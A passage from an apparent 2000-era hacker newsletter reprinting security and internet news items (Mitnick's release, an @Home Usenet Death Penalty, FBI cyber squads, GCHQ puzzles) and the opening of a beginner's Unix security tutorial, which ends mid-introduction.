~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Kevin Mitnick is set to be released from federal prison next Friday. While his family and supporters will celebrate the occasion what sort of life can Kevin look forward to? Will the court order preventing him from accessing computer equipment help in his reform? Kevin Poulsen examines these questions in his ZD Net article. Chaos Theory http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2128328,00.html Mitnick’s Digital Divide It’s the year 2000, and Kevin Mitnick is going free. The problem is, he’ll be trapped in 1991. By Kevin Poulsen January 12, 2000 On Friday, January 21, hacker Kevin Mitnick will go free after nearly five years behind bars. But when he walks out the gates of the Lompoc federal correctional institution in California, he'll be burdened with a crippling handicap: a court order barring him for up to three years from possessing or using computers, "computer-related" equipment, software, and anything that could conceivably give him access to the Internet. These anti-computer restrictions are even more ridiculous today than when I faced them upon leaving federal custody in June, 1996. In the wired world of 2000, you'd be hard pressed to find a job flipping burgers that didn't require access to a computerized cash register, and three years from now McDonald's applicants will be expected to know a little Java and a smattering of C++. Since Mitnick's arrest in 1995, the Internet has grown from a hopeful ditty to a deafening orchestral roar rattling the windows of society. The importance of computer access in America has been acknowledged by the White House in separate initiatives to protect technological infrastructure from "cyberterrorists," and to bridge the so-called digital divide between information haves and have-nots. "We must connect all of our citizens to the Internet," vowed President Clinton last month. He was not referring to Kevin Mitnick. Mitnick, dubbed the "World's Most Notorious Hacker" by Guinness, pleaded guilty on March 26 to seven felonies, and admitted to cracking computers at cellular telephone companies, software manufacturers, ISPs, and universities, as well as illegally downloading proprietary software. Though he's never been accused of trying to make money from his crimes, he's been in and out of trouble for his nonprofit work since he was a teenager. So, the theory goes, keeping Mitnick away from computers will deprive a known recidivist of the instruments of crime and set him on the road to leading a good and law-abiding life. I've heard that theory from prosecutors, judges and my (then) probation officer. They all compare computers to lock picks, narcotics, and guns-– everything but a ubiquitous tool used by a quarter of all Americans and nearly every industry. Mitnick, we should believe, will be tempted in the next year or so to crack some more computers and download some more software. But when the crucial moment comes for him to commit a felony that could land him in prison for a decade, his fingers will linger indecisively over the keyboard as he realizes, "Wait! I can't use a computer! My probation officer will be pissed!" The fact is, if Mitnick chooses crime, he won't be deterred by the 11 months in prison that a technical supervised release violation could carry. These conditions only prevent him from making legitimate use of computers. Mitnick's rehabilitation is up to him. But the system shouldn't throw up obstructions by keeping him away from the mainstream, on the sidelines, and out of the job market. His probation officer will have the power to ease his restrictions, perhaps by allowing him to get a computer job with the informed consent of his employer. That would be a good start. January 21 will be a happy day for Mitnick, his family, and friends. But getting out of prison after a long stretch carries challenges too. Nobody is served by stranding the hacker on the wrong side of the digital divide. @HWA 99.0 Internet Banned From Jewish Homes 01/14/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Dildog The ultra-orthodox Council of Torah Sages (an important leadership group in the Jewish community, based out of Israel) signed a ruling banning the Internet from the homes of all Jews. The ultra-orthodox constitute less than 1%" of the total Jewish community in Israel, however, it is unknown how much influence over the rest of the community the council has. Wired http://www.wired.com/news/culture/0,1284,33583,00.html Fahrenheit 451, Jerusalem Style by Tania Hershman 3:00 a.m. 13.Jan.2000 PST JERUSALEM -- The Internet ban issued by leading ultra-Orthodox rabbis last week has not prompted a great outcry within Israel's ultra-Orthodox community, where television was outlawed decades ago. "There needed to be a ban," says Deborah Spier, the mother of nine children aged between 2 months and 15 years who stopped to read the announcement of the ruling posted up around Jerusalem's ultra-Orthodox Mea Shearim neighborhood. "Children use the computer at 2 a.m. and you have no idea what they are doing. You can't control it." While she has a computer (but no television) at home, Spier's family is not and has never been connected to the Internet. Her children don't mind. "I have a teenage son who enjoys computers and has a lot of games, but the children themselves felt that it was taking over," she said. "You can say that you are denying children, but they have other ways of finding information. There are libraries." The ruling, signed by 30 rabbis from different ultra-Orthodox communities, expressly forbids Internet connections at home and states, in fact, that "the computer should not be used for entertainment at all." However, those "whose livelihood depends on it" are allowed access to the Internet in the workplace, with "the responsibility not to let others use it." Is its aim simply to shield children from unsuitable material? "I don't think it is only for children," says Spier, but blushes rather than mention who else might be in need of "protection" and from what sort of online temptation. Chaim Mor, who runs the Torah Scholar Software store on a cobbled Mea Shearim shopping street, agrees that it is not just children who are perceived to be at risk. "Children range in age up to 120," he says. He does not believe this ruling is controversial. According to him, many ultra-Orthodox homes have PCs, but few have Internet connections. "The people that have the Internet have it for work-related reasons," he said. "A lot of people are involved in the computer field or people want access to Jewish and Torah sites." Torah Scholar Software itself sells some of its merchandise online through Jewish Software, just one of thousands of Jewish sites. Others are the Shema Yisrael Torah Network and Jewish Chat. These sites demonstrate that the Internet's value for disseminating information is not lost on the Jewish community. Aish HaTorah, for example -- an Orthodox organization with the stated purpose of "outreach" to non-observant Jews -- has a Web site filled with all types of religious content, from the Jewish take on Y2K to online religious study courses, and even an "Ask the Rabbi" feature. "I definitely understand the concerns that the religious world is feeling," says Aish HaTorah's director of development, Rabbi Ephraim Shore. "The potential for damage, especially for young people, is huge. And this is not confined to the religious world. The No. 1 use of the Web today is pornography. Do most parents want to make this available to their children?" "However," he continued, "at the same time, the upside potential for learning and education is probably equally as huge. While I understand where the [orthodox] rabbis are coming from, I believe that there are ways to moderate and control Internet use using different programs available." One way to do this may be through ISPs such as Koshernet, which labels itself a "safe and kosher link to the Information Superhighway." Koshernet only allows subscribers to access sites that have already been passed by their site-checkers. Currently, Koshernet is only available in the US and Canada, but it is expanding to the United Kingdom and France. It expects to be available in other European countries and Israel by the end of 2000. "The Koshernet was established to give a solution for anyone who needs to use the Internet for work and business, but doesn’t want to be exposed to offensive material," said president Jacob Gubits. "Since our establishment 3 years ago, we have the full support of the rabbinical authorities of different communities." Regardless of whether Koshernet takes off, Aish HaTorah is expanding its Web presence and hopes for one million visitors a month when the new site ("the Amazon.com of the Jewish World," boasts Shore) is launched in a few weeks. "I think personally that to ignore the Internet is to put blinders up. It is going to be there anyway," he says. "I think that the opportunity for Jewish education on the Web may be the biggest opportunity for the Jewish people in years -- maybe ever. The potential for outreach is endless. We have never had that opportunity before. @HWA 100.0 NJ Teens Steal CC Numbers 01/14/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Four teenagers in New Jersey have been arrested and charged with fraud, conspiracy, credit card theft and receiving stolen property. The boys, aged 14 to 16, tricked customers of AOL to reveal their personal information including credit card numbers. The teens then used the numbers to order items that where shipped to unoccupied houses. Nando Times NJ Teens Steal CC Numbers http://www.nandotimes.com/technology/story/body/0,1634,500153859-500189471-500804836-0,00.html N.J. teens charged with tricking Internet users out of credit card numbers Copyright © 2000 Nando Media Copyright © 2000 Associated Press GALLOWAY TOWNSHIP, N.J. (January 13, 2000 7:00 a.m. EST http://www.nandotimes.com) - Four teenage boys have been charged in what police say was an Internet scam using stolen credit card numbers to defraud hundreds around the country. The boys, ages 14 to 16, obtained credit card numbers by tricking America Online and Earthlink subscribers into transmitting their account information to the teens over the Internet, Detective Jay Davies said. The information allowed the teenagers to obtain the passwords, addresses, phone numbers and credit card numbers of people in New Jersey, New York, Pennsylvania, Ohio, Florida, Nebraska, Texas and elsewhere. The alleged scammers then used the credit card numbers to make about $8,000 in purchases, arranging to have the merchandise delivered to unoccupied homes, according to Davies. Police were alerted when John Bertino of Galloway Township complained that charges for $1,000 in "kids stuff" - including a Sony Playstation - had shown up on his Visa credit card. America Online spokesman Rich D'Amato said Wednesday that the company warns subscribers against giving out their passwords or other sensitive information and that AOL staffers will never ask a subscriber for a password or billing information. The teenagers, whose names weren't released, are all students at the same high school. They were arrested between Dec. 23 and Jan. 6 and charged with fraud, conspiracy, credit card theft and receiving stolen property. @HWA 101.0 Radius Net takes over Attrition Mirrors 01/14/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by audit Although Attrition.org is temporarily down due to a crashed hard drive Radius.net has agreed to host defacement mirrors at their site until attrition can be repaired. The attrition staff will still be on hand to mirror the defacements but they will be hosted at www.radiusnet.net/mirror. Notification of defacements can be sent to hacked@radiusnet.net. Radius.net http://www.radiusnet.net/mirror @HWA 102.0 New Ezines Available 01/14/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Hell and Xenos There is a new spanish e-zine available called Digital Rebel, Issue #3 of Digital defiance has also been released. Digital Rebel http://www.digitalrebel.net/heh/ Digital Defiance http://digital-defiance.hypermart.net @HWA 103.0 FBI to Beef Up CyberCrime Investigation Abilities 01/15/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Fed The National Plan for Information Systems Protection, released earlier this week by President Clinton, details plans for the FBI's National Infrastructure Protection Center (NIPC) to establish a National Infrastructure Protection and Computer Intrusion Program in the FBI's counter terrorism division. The FBI plans to comply with this directive with the formation of new investigative teams specializing in computer intrusions and attacks at all 56 of its field offices around the country. At least one computer forensics examiner will also be assigned to each field office. Federal Computer Week http://www.fcw.com/fcw/articles/web-fbi-01-14-00.asp The full text of Clinton's cybersecurity plan can be viewed and downloaded here: http://www.ciao.ncr.gov FBI beefs up cyberagent squads nationwide BY Bob Brewin 01/14/2000 The FBI plans to reinforce its mission to counter cyberattacks with the formation of new investigative teams specializing in computer intrusions and attacks at all 56 of its field offices around the country. The agency also plans to assign at least one computer forensics examiner to each field office. The National Plan for Information Systems Protection, released on Jan. 12 by President Clinton, outlines plans for the FBI's National Infrastructure Protection Center (NIPC) to establish a National Infrastructure Protection and Computer Intrusion Program in the agency's counterterrorism division. The NIPC is charged with centrally managing the nation's defense of telecommunications systems, railroads and electric power systems against attacks. The plan calls for computer-intrusion squads to conduct network intrusion detection, respond to threats, collect intelligence and conduct counterintelligence investigations. The FBI also plans to expand its training program to produce technically savvy computer investigators, and will provide that training to federal law enforcement personnel as well as state and local agencies. The NIPC trained 170 FBI agents and 17 personnel from other law enforcement agencies in 1998, and by the end of this year will have trained an additional 500 law enforcement officers. The NIPC, according to the president's plan, wants to train one computer-intrusion investigator and at least one trainer from state-level investigative agencies in each of the 50 states and Washington, D.C. @HWA 104.0 UDP Called For Against @Home 01/15/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by the.new.guy A USENET Death Penalty (UDP) has been called against @Home effective 17:00 Tuesday, January 18. The result of the death penalty would be that all @Home Users are about to have all of their news postings BANNED from all of USENET due to the continual spamming by its customers. @Home has responded to the UDP by claiming that the problem is customers who set up proxies and that they will work to resolve the problem. Wired http://www.wired.com/news/technology/0,1282,33638,00.html @Home Statement - via Deja.com http://www.deja.com/getdoc.xp?AN=571636137 Wired; Dead ISP Walking by Andy Patrizio 2:10 p.m. 13.Jan.2000 PST Anti-spammers fed up with ExciteAtHome's blasé efforts to prevent unsolicited emails are threatening to block messages coming from the cable Internet provider. The company's AtHome networking group is the latest ISP threatened with a Usenet Death Penalty (UDP) for repeatedly failing to keep spam from flooding Usenet newsgroups. ExciteAtHome has until 18 January to clean up its act. Considered a last resort, a UDP is issued by the frustrated voluntary group of network administrators and spam fighters after months of complaints fall on deaf ears. An ISP has five business days to respond to the death penalty warning. Should the provider fail to act, a message is sent out to every ISP that all Usenet postings from the offending ISP are to be deleted, whether they're spam or not. "It does apply pressure on the provider to do something, often in instances where nothing is being done," said David Ritz, a Milwaukee resident and one of the many spam-busters who has called for UDPs in the past. "The solutions are not easy, they are quite technical, and it will cost them some money, but it won't cost them as much money as bad publicity will cost them," Ritz said. UDPs will continue to be used to get the attention of management, he said. "The grunts at the lowest level are aware of the problem but can't get the attention of management," he said. "[Only] the threat of [a UDP] will get their attention." In this case, it worked. ExciteAtHome officials posted a note on news.admin.usenet.net-abuse, a Usenet newsgroup where the UDP was first discussed. The posting stated that due to improperly installed proxy software, its subscribers were turned into relay conduits for spam, and spammers took advantage of the faulty configuration. Most of the AtHome abuse comes from "open" proxy servers. Normally, AtHome news servers are only accessible to AtHome subscribers, but an open proxy server means anyone can connect to it and use it to post messages on Usenet. "As of today, we are stepping up our involvement and taking more aggressive action by performing frequent network-wide scans of our customer base to target proxy servers," wrote David Jackson, manager of network policy management at ExciteAtHome, in Mountain View, California. "We are committed to promoting better AtHome participation on the Usenet, and we are in the process of modifying our current news product and news architecture." Ritz is cautiously optimistic. He plans to request that the UDP be given an extension of two to four weeks to give ExciteAtHome time to implement all of the things it needs to get control of the problem. "I believe they are taking this extremely seriously," he said. "I hope AtHome will come out of this as a respected member of the community, which it should if they do what's necessary." Ritz is part of a team of spam fighters, whom he describes as overworked, "underslept," and volunteer. "Every one is working very hard to put themselves out of a job. There's nothing they'd like more than to not be needed," he said. To activate the death penalty, the groups send out cancellation messages that are replicated across Usenet news servers to delete messages identified as spam. Usenet is the pioneering message board system of the Internet for open discussion of any and all subjects. In recent years, Usenet has been abandoned in favor of message boards on Web sites for a number of reasons, spam not the least of those reasons. One of the worse spammers Ritz ever saw posted 120,000 messages in a 24-hour period. Ritz said the top three current offending sources for spam are AtHome servers, and that 25 percent of all traffic from AtHome's news servers is spam. To qualify as "spam," a message has to be posted to 20 or more newsgroups. The extremely effective UDP has been issued against America Online, CompuServe, Erols.com, TIAC, BBN Planet, and Netcom, according to the UDP FAQ. In every case, the ISP dealt with the problem before a UDP was issued. The worst offender was UUNet, which had no acceptable use policy and did not respond to months of complaints. At the time the UDP was issued in 1997, 40 percent of all Usenet traffic was spam, much of it originating from UUNet. To make their point, in early 1999 the spam busters took a week off and allowed the spam to flow freely. The end result was news servers all over the world suddenly filled up, causing disk-full errors. "This was so dramatic it had the single greatest effect on reducing the volume of spam," said Ritz, who claimed it also increased support for UDPs. "Admins became aware of just how desperate and drastic the condition was." @HWA @HOME Statement: Subject: [usenet] Usenet Death Penalty Notice: @Home Network Date: 01/12/2000 Author: David Ritz -----BEGIN PGP SIGNED MESSAGE----- [posted and mailed] [Please direct follow ups to news.admin.net-abuse.usenet.] Posted to: news.admin.net-abuse.usenet news.admin.net-abuse.policy news.admin.net-abuse.bulletins news.admin.announce Mailed to: abuse@corp.home.net news@corp.home.net noc@corp.home.net abuse@rogers.home.net Internet.Abuse@shaw.ca David Jackson Over the past year, @Home Network has been the source of vast quantities of Usenet spam. Despite countless complaints, reports, and phone calls, @Home Network shows no inclination towards stopping this ongoing abuse. By December, 1999, the situation reached unconscionable levels of abuse. Currently there is still a huge volume of EMP spam originating both directly from @Home's @Home grown spammers and through the countless open proxies to their news servers. These open proxies present a very clear threat to the entire Usenet community at large. The data included in the following article shows a trend of persistent and increasing abuse. } Newsgroups: news.admin.net-abuse.usenet,news.admin.net-abuse.misc } Date: Sun, 9 Jan 2000 22:20:54 -0700 } From: David Ritz } Reply-To: David Ritz } To: abuse@corp.home.net, news@corp.home.net, abuse@rogers.home.net, } Internet.Abuse@shaw.ca } cc: David Jackson } Subject: [RFD] @Home UDP Proposal: A Request for Remedial Action } Message-ID: } Followup-To: news.admin.net-abuse.usenet Because of this lack of response to serious, ongoing problems, even when they have been pointed out repeatedly, a full active Usenet Death Penalty will go into effect at the close of business, 17:00 PST, on Tuesday, 18 January 2000 (19 Jan 2000 01:00:00 GMT). Please see the Usenet Death Penalty FAQ, . This action will affect all traffic posted to the @Home Network news servers, having a Path stamp of *.*.*.home.com.POSTED. It is sincerely hoped that @Home Network. will take appropriate measures to stem the flow of abuse from their network before this time. Any assistance which they may require will be gladly provided. Should this action become unavoidable, sites not wishing to participate may alias out the pseudosite homeudp!. Sites not wanting to participate in any active UDPs may alias out the pseudosite !udpcancel!. - -- David Ritz Finger for PGP Public Keys Fight against spam & spammers http://spam.abuse.net Outlaw Junk Email. ++++++ Join CAUCE ++++++ http://www.cauce.org ** Be kind to animals - Kiss a shark. ** -----BEGIN PGP SIGNATURE----- Version: PGP Personal Privacy 6.0.2 Comment: Finger:dritz@primenet.com for public keys iQCVAwUBOHwYJNzLrWGabIhRAQErcwQAhZS/JXY+TGBrxXsdLVgHss38OV0r9oVN ix1UodLsbn0upUP8u3xACKREfxySW/kK/uuyz2C5DwlhB4OM6fN2w0H21QbGHmIe XNvBZq2ap1FQlHYCByO/5m7bPyi0xrYbW+R4XLo20NMEqSFxTuvgT4UBHMKVebh1 wu++QUc3pGw=9Vdy -----END PGP SIGNATURE----- @HWA 105.0 ACPM Changes Name and Stops Intrusions 01/15/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by lawless Originally featured on HNN several months ago, the ACPM (Anti Child Porn Militia) has evolved into an organization which uses technical, though legal and ethical techniques to combat the growing child pornography trade on the internet. Changing their name to ACPO (Anti Child Porn Organization) the group hopes to move away from "Hacktivism" towards a hack-free methodology to identify and shut down child pornography traders and their sites. ACPO http://www.antichildporn.org/site/html/news.html LATEST NEWS AND UPDATES January, 13, 2000 Official press release from ACPO: Hacking to Stop Child Pornography -- Committing a Felony to Stop A Felony. Child pornography is obscene evidence of a heinous act. Yet, there are those who enjoy viewing, collecting, and trading pieces of it. Guess what? The Internet is their new medium of choice. So what is be done about it? What *can* be done about it? Seemingly, nothing. How can a site located in a country, with inadequate laws to prohibit child pornography sites, be shut down? The ACPO says NO to those who say hacking is the solution. "To Hack, or Not to Hack -- For That is the Question." Natasha Grigori was the parent of a group dedicated to the disabling of child pornography web sites. The group's efforts achieved mixed results, as Natasha explains: "We were able to shutdown sites, but they would just come up elsewhere. They would come up more secure then before. We were winning battles, but loosing the war." Despite great amounts of effort on the part of ACPM (Anti ChildPorn Malitia - the original group) advocates, Grigori unable to achieve satisfactory results. Despite a warm reception off the record, crucial support companies were not willing to put themselves at risk by working with hackers. "We couldn't fight a felony with a Felony.", says Natasha. "We had to change. We had to become Legit." Then Anti ChildPorn Organization was founded March 1 1999, after months of evolving in the ACPM's philosophy and organization. Is ACPO a Hacker in Sheep's Clothing? The problems which entailed the usage of computer hacking to stop child pornography ran deeper than internal philosophy, however. Law enforcement agencies were reluctant to deal with a hacking group. The reluctance to deal with hackers stemmed from a mistrust of hackers, and a fear that the new socially conscious hacking was just a new attempt to pull the wool over the eyes of the public. A New Hope: After the shift into an entirely legal movement the ACPO shifted its technological energies away from hacking, towards the problem of identifying who the people are who provide child pornography sites as well as identifying those individuals who subscribe to these services. "Its a simple matter of supply and demand.", explains Natasha, "If we only attack the supply, then a new supply will move in to fill the demand. Our approach will target those who supply the child pornography and the patrons of the suppliers." To these ends the ACPO has embarked on projects to create international legal partnerships, and to develop information warehousing tools to gather, process, and interpret large amounts of information in an attempt to identify the real world individuals behind the child pornography trade. ACPO is also taking a pro-active approach on child pornography by working with education partners to educate students about child abuse and the resources available to them. ACPO will be lobbying government for tougher laws on child pornography and its communication via the Internet. For those who send or receive child pornography, Natasha has a warning: "None of you are safe. We will find and stop you." About ACPO: The AntiChild Porn Organization is an international, non-profit group with over 500 members, government and corporate partners. ACPO is defining the battleground for what will be a predominantly high-tech and legal battle against child pornography. The ACPO web site is located at www.antichildporn.org. January, 12, 2000 Added a link to pedowatch one of oldest group fighting child porn on the Internet.Thank you for their terrific support! January, 7, 2000 I will be temporary the webmaster for ACPO. I'd like to thanks, in the name of ACPO head office all job done by Kissblade. Feel free to contact me for any questions. Deepquest January, 5, 2000 My turn: after a few months, as Webmaster, Site Designer and BBS Administrator (and site sponsor), I sign off....I wish you good luck. KissBlade December, 13, 1999 ACPO was just given 9 cases of COMPUTER COP http://toughcop.com Thanks for the donation, and all your help and upcomming assistance. December, 8, 1999 A special note from Natasha: I would like to take this opportunity to publicly acknowledge the very special contribution from http://thetrainingco.com. They hosted us at their Techno-Security Conference and introduced us to many key people who can make a DIFFERENCE. I am also humbled and pleased to announce that Jack Wiles and Don Withers, have agreed to become working members and ACPO Directors. Thank you, gentlemen we welcome your support in helping the children. December, 2, 1999 A producer on the Sally Jesse Raphael Show in New York, contacted us, for an interview. They are doing a show on Dec. 14th on Sex Crimes on the Internet. We turned down that interview on Dec 6th. We need to finish up our Media Kit first and we are looking for more sophisticated forum. December, 1,1999 Award for this site! from Political Site of the Day " Nice job! Congratulations, and thanks for making the Web a more informative and interesting place to visit. We've been spotlighting sites for over three years, and we're glad to add you to our library." Wayne Kessler Political Site of the Day November, 15,1999 Secure Data Technologies Corp. has agreed to verify our reports and add that information to the National Data Base. We will also have access to that DB. November 1999 site moved-> new webhost .... October, 20-23, 1999 TheTrainingCo.com http://www.thetrainingco.com Thanks Jack Wiles and everyone that has offered their help and are helping ACPO. Shouts out to Doug Stead http://www.eap.ca for graciously speaking for ACPO, and agreeing to at the April 2000Conference. October, 17, 1999 After a wild year on the ACPO team, I am signing off. Just want to say thanks to those who contributed, and wish ACPO success. cylent1 October, 3, 1999 Trip to speak with programmer. ACPO had a problem that needed solving: a ChildPorn BBS...We met with Domino about creating a spider, to compile information for ACPO. It was a successful meeting and within a month, Domino created the BBSCreep. The information is being sent to the authorities Update September,29,1999 Check the Resource Page - new, very informative links and new Banner ! September, 20-24, 1999 New York City trip to meet with The Cyber Angels http://www.cyberangels.org @HWA 106.0 GCHQ Wants a Few Good Cryptographers 01/15/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench GCHQ, the British equivalent to the NSA, has posted several codes on its web sites in the hopes of identifying new recruits. The codes have been deciphered by 15 people since Christmas. GCHQ is hoping to fill 100 vacancies in its staff. BBC http://news.bbc.co.uk/hi/english/uk/newsid_601000/601960.stm Government Communications HQ http://www.gchq.gov.uk Spying game lures hopeful snoopers Cryptic messages concealed on the internet are being used to lure talented codebreakers to a career with British intelligence. GCHQ, which eavesdrops on global communications for the UK Government, has placed a series of codes on its website and invited visitors to crack them. The five-part puzzle unravels to form a message to potential job applicants, who may find their chances of employment greatly enhanced by cracking the code. The unusual recruitment drive is reminiscent of the World War II effort to crack the Enigma code, used to direct German U-boats to their targets. Station X Then, keen crossword solvers, mathematicians, academics and chess masters were recruited to work at Bletchely Park - known as Station X - near Milton Keynes. Their skills in cryptic analysis proved crucial in developing early computer technology, which succeeded in cracking the code. The hidden code was posted on GCHQ's website before Christmas and the first person cracked it successfully within 48 hours. Fourteen others have managed it since. But David Shayler, the former MI5 agent exiled to Paris after breaking the Official Secrets Act, told BBC News Online the exercise was pointless. "GCHQ should put more effort into managing its staff better and adopting the kind of open approach that will ensure it employs the right people, instead of wasting time and money with games. "And the kind of people with lively minds this appeals to will soon discover that this kind of thing is all done by computer anyway." A GCHQ spokeswoman said the code, backed by a national newspaper campaign to recruit technologists and linguists, was aimed at catching the imagination of would-be applicants to fill up to 100 new vacancies. "It is certainly a new way of contacting potential employees and it gives us an indication of the kind of skills we are looking for," she said. "We hope people will be interested and challenged to have a go to see what they can find." But those who do manage to crack the code are warned not to hand in their notice straight away. All GCHQ applicants undergo a two-month vetting procedure in which their professional and private lives are placed under scrutiny - a process that may deter some of the internet's more "creative" hackers. @HWA 107.0 Internet Intoxication Used as Defense 01/15/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench A teenager who has been accused of issueing a threat against Columbine high school via the internet will argue that he was suffering from 'Internet Intoxication'. Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500154005-500189672-500806798-0,00.html 'Internet intoxication' defense planned in Columbine threat case Copyright © 2000 Nando Media Copyright © 2000 APonline By STEVE GUTTERMAN DENVER (January 13, 2000 1:02 p.m. EST http://www.nandotimes.com) - A flamboyant Florida lawyer who offered a "television intoxication" defense in a 1970s murder case plans to argue that a teenager accused of making an online threat against Columbine High School was suffering from "Internet intoxication." Michael Ian Campbell, an 18-year-old aspiring actor from Cape Coral, Fla., was "role-playing" when he sent a message threatening to "finish" what began in the massacre last April, Miami lawyer Ellis Rubin said Wednesday. Columbine students Eric Harris and Dylan Klebold shot and killed 12 students and a teacher April 20 before killing themselves in the nation's deadliest school shooting. "To intoxicate is to elevate yourself into a state of euphoria, even into madness," Rubin said. "You've logged on and gone into this imaginary world, this playland, this make-believe arena." He added: "That's why I call it Internet intoxication. The more they go into the Internet, the more bizarre their role-playing becomes." The U.S. attorney's office did not immediately return calls for comment on the strategy. Diane Cabell, a fellow at the Berkman Center for Internet & Society at Harvard Law School, sees little difference between the authors of anonymous Internet threats and people who make obscene phone calls. "They know what they're doing. It's just a cheaper way to stalk," she said. Rubin's strategy is something of an update of the argument he used in defense of another Florida teenager in 1977, when many baby boomers were as glued to their TV sets as their children are to computer monitors today. Ronny Zamora, 15, was convicted of murdering an elderly neighbor in Miami Beach after a trial in which Rubin argued that "television intoxication" led to the slaying. In an appeal, Zamora turned against his lawyer and claimed the TV intoxication argument made a mockery of his defense. But the court upheld the conviction and said Rubin's argument may have even worked to Zamora's advantage. Rubin also is known for a nymphomania defense. In 1991, he represented a woman accused of prostitution who blamed her actions on nymphomania that she said was a side effect of the antidepressant Prozac. The woman and her sheriff's deputy husband, accused of being her pimp, eventually pleaded guilty. Campbell, 18, is charged with transmitting a threat against another person in interstate commerce, punishable by up to five years in prison and fine of $250,000. He goes on trial in federal court on Feb. 28. @HWA 108.0 Blacksun's Unix Security For Newbies.version 1.0, 21/11/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Basic Local/Remote Unix Security for Unix Newbies <===============================================> version 1.0, 21/11/99 Written by: R a v e N, Black Sun Research Facility. Black Sun Research Facility - http://blacksun.box.sk <--! Begin copyright bullshit !--> All copyrights are reserved. You may distribute this tutorial freely, as long as you keep our names and Black Sun Research Facility's URL at the top of this tutorial. I have written this tutorial for you, the readers. But I also wish to remain the author of this guide, meaning I do not want people to change a line or two and then claim that the whole guide is theirs. If you wish to create an altered version of this tutorial, please contact me by Email - barakirs@netvision.net.il. <--! End copyright bullshit !--> <--! Begin disclaimer !--> Yada yada yada... you know the drill. I did not write this tutorial for people to learn "how to hack" and crack into and possibly damage other machines. It is solely intended to teach the reader a lesson about Unix security. Also, I am not responsible to any damage caused by using any of the techniques explained in this guide. <--! End disclaimer !--> ########### # ### ######### ## # ############ ### ##### ### ##### ### ## ##### #### ##### ####### ### ### #### ### ##### ##### ####### ######### ### # #### #### #### ##### ####### ########### ### ### #### ######### ####### #### #### ### ####### ########### ##### ##### ##### ### ## ####### ############# ### ## ###### ######### ### #### ######### ###### #### # #### ######## ##### ## ###### ### ### ###### #### ########## #### #### ######### ### ##### ##### #### ########## ### ### ####### #### ###### ############# ########## ## ## ##### #### #### ########### ######## ## ## ### ### ## ####### # # # # ########## ## ## ## ## ### ### ## ## ### ### ### # ### ### ##### #### Black Sun Research Facility ### ## ## ###### #### http://blacksun.box.sk ### ## ## ####### #### ASCII By : cyRu5 # ### ### ### #### ####### ### #### #### #### ### ##### ########### ########### ## ### ######### ####### # # Introduction ============ This guide is meant for Unix newbies who want to learn a little about basic Unix security, and how to secure their box. Most systems come very very insecure out-of-the-box. What is out-of-the-box (let's call it OOTB from now on), you ask? An OOTB system is a system which was just installed. All the default configurations are turned on, which means zero personalization (besides maybe a little personalization made during the installation process) and quite a lot possible security problems. Also, there are some very basic concepts that most newbie Unix users aren't familiar with. During this tutorial, I will teach you how to change default configurations, basic packet filtering, how to secure your system's networking services (or completely remove them or some of them, in case you don't need them, in order to increate your computer's security), how to use, how to avoid trojans, what are sniffers, how to maintain local security between different users in your system (if you're not the only one using this system, whether it's locally or remotely), some stuff about SSH, how to protect yourself against computer viruses under the Unix system, what are security scanners and how to use them, why you should encrypt your important data and how etc'. Now, it is advised to go through Black Sun's previous tutorials (see blacksun.box.sk) prior to reading this tutorial. They contain some basic concepts and terminology which you need to know and you're might not familiar with. Also, you should have some basic Unix knowledge and experience. If you don't have that kind of knowledge yet, we advise you to go to the local computer store and buy a basic Unix book (it shouldn't cost too much), or, if you really want to, order a specific one from the Internet (or even better: go to blacksun.box.sk/books.html and order a book from there. We get 15% of the money you pay... :-) This doesn't mean that you pay more, though. We simply get 15% out of the money you pay). Don't worry about online ordering, it's completely secure as long as you order your books from Amazon.com (they're considered the most secure E-Store on the planet, and I order lots of books from there). Oh, one last note: this tutorial is in no way a complete one (Duh! It's a BASIC tutorial, in case you havn't read the title). I included everything I could possibly think of (that is notable for a beginners guide in this field, of course). With time, I will add more chapters, so make sure you have the latest version by visiting blacksun.box.sk often or subscribing to Black Sun's mailing list (info on how to subscribe at blacksun.box.sk also). Okay, heads up! Here we go! Setting The Ground ================== First of all, I assume that you are using either RedHat Linux or Mandrake Linux. Why is that? Because most Unix newbies use either of these two distributions. Don't worry, it's no crime to use them or something, and it's not "lame". Each distribution has it's advantages. RedHat and Mandrake, for example, both have simple installation and come with a lot of utilities built-in. That's okay, although I like Slackware Linux and OpenBSD better (I'll explain why in a second). Now, some of you might be asking right now "but... but I have a different distribution! Will this stuff work for me too?". Before I answer this question (to the impatient ones of you, I can already say "yes", but that's not the exact answer. Read on and you'll understand), I want to explain what is a distribution (otherwise known as a "distro" or a "flavor" of Unix), why there are so many of them, where you could learn about all the different distributions and how to choose the right distribution for you. Unix was first distributed freely and in open-source form. If you're not familiar with any programming language, then you're not familiar with the term "source code". I'll explain. The simplest way to show you what source code is is to send you to a webpage. Take hackernews.com (a personal favorite) for example. Every common browser has an option to view the page's source from within the browser, but let's pretend you don't know how to do this or you don't even have this option within your browser. First, wait for the whole page to load. Then, save it to your hard drive, a diskette or whatever. Then, open the HTML page you've just saved with any text editor (Pico, KEdit, Emacs, Notepad, UltraEdit, whatever). Now what do you see? No more text 